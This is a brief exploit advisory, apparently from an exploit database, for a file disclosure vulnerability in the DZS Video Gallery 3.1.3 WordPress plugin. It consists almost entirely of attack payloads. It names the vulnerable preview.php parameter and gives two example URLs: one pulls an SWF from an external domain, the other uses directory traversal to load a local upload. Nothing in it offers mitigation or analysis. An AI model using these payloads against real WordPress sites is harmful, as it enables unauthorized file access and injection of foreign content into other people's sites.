WordPress Plugin DZS Video Gallery 3.1.3 – Remote and Local File Disclosure Vulnerability

Exploit:
/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=[
SWF LINK ]

http://localhost/wp/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=http://www.cristgaming.com/pirate.swf
http://localhost/wp/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=../../../../uploads/2013/12/The_Exorcist.swf